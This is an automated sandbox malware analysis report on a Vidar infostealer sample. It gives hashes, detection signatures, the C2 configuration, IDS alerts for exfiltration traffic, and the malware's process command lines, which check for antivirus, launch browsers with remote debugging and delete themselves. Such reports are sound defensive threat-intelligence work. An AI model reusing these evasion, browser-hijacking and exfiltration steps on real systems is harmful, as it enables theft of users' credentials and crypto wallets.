Windows Analysis Report
JA7cOAGHym.exe

Overview

General Information

Sample name: JA7cOAGHym.exe (renamed because original name is a hash value)
Original sample name: 6e90f0e42285206dce01ffbbd748b081.exe
Analysis ID: 1581382
MD5: 6e90f0e42285206dce01ffbbd748b081
SHA1: 553136becab0e4000f4a47b68d732c2e921cbdc9
SHA256: 9b2f6d11a8ffb4d7124fe6ce8ace1672070ee668759900130100d81bc5378dc2
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • JA7cOAGHym.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\JA7cOAGHym.exe" MD5: 6E90F0E42285206DCE01FFBBD748B081)
    • cmd.exe (PID: 576 cmdline: "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 4028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3716 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5236 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c md 208079 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7148 cmdline: extrac32 /Y /E Validation MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3452 cmdline: findstr /V "SAO" Offering MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4204 cmdline: cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Pokemon.com (PID: 6468 cmdline: Pokemon.com y MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 2504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 2000 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 6664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 7252 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3032 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 348 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 12.2.Pokemon.com.4230000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 12.2.Pokemon.com.4230000.1.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io | (listed below) |
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                System Summary

                Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Pokemon.com y, ParentImage: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, ParentProcessId: 6468, ParentProcessName: Pokemon.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6180, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 576, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5236, ProcessName: findstr.exe
                | Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
                |---|---|---|---|---|---|---|---|---|
                | 2024-12-27T14:46:51.853531+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.8.178 | 443 | 192.168.2.5 | 49784 | TCP |
                | 2024-12-27T14:46:54.194581+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.8.178 | 443 | 192.168.2.5 | 49790 | TCP |
                | 2024-12-27T14:46:49.516195+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49778 | 116.203.8.178 | 443 | TCP |
                | 2024-12-27T14:46:47.093401+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49772 | 116.203.8.178 | 443 | TCP |

                AV Detection

                Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: JA7cOAGHym.exe, Virustotal: Detection: 40%
                Source: JA7cOAGHym.exe, ReversingLabs: Detection: 28%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.2% probability
                Source: JA7cOAGHym.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50015 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:50001 version: TLS 1.2
                Source: JA7cOAGHym.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_000FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FDC54
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_0010A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A087
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_0010A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A1E2
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_000FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_000FE472
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_0010A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0010A570
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_000CC622 FindFirstFileExW,12_2_000CC622
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_001066DC FindFirstFileW,FindNextFileW,FindClose,12_2_001066DC
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_00107333 FindFirstFileW,FindClose,12_2_00107333
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_001073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001073D4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_000FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FD921
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\208079
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\208079\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
                Source: chrome.exe, Memory has grown: Private usage: 9MB later: 39MB

                Networking

                Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49778 -> 116.203.8.178:443
                Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49772 -> 116.203.8.178:443
                Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.8.178:443 -> 192.168.2.5:49784
                Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.8.178:443 -> 192.168.2.5:49790
                Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: DNS query: fa5lt.xyz
                Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 20.189.173.1 20.189.173.1
                Source: Joe Sandbox View, IP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox View, JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown, HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50015 version: TLS 1.0
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknown, TCP traffic detected without corresponding DNS query: 104.18.38.233
                Source: unknown, TCP traffic detected without corresponding DNS query: 172.64.149.23
                Source: unknown, TCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.57.90.143
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.200.88.9
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.57.90.145
                Source: unknown, TCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com, Code function: 12_2_0010D889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_0010D889
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: fa5lt.xyz | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 | Host: clients2.googleusercontent.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global traffic, HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1 | Host: assets.msn.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: same-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                Source: global traffic, HTTP traffic detected: GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 | Host: c.msn.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: same-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                Source: global traffic, HTTP traffic detected: GET /b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 | Host: sb.scorecardresearch.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global traffic, HTTP traffic detected: GET /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 | Host: sb.scorecardresearch.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: UID=10F921920583e33615b2b9d1735307250; XID=10F921920583e33615b2b9d1735307250
                Source: global traffic, HTTP traffic detected: GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B HTTP/1.1 | Host: c.msn.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; SM=T
                Source: 6d4ecc2d-82ed-48b8-8605-a534cd846610.tmp.22.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log1.22.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log1.22.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
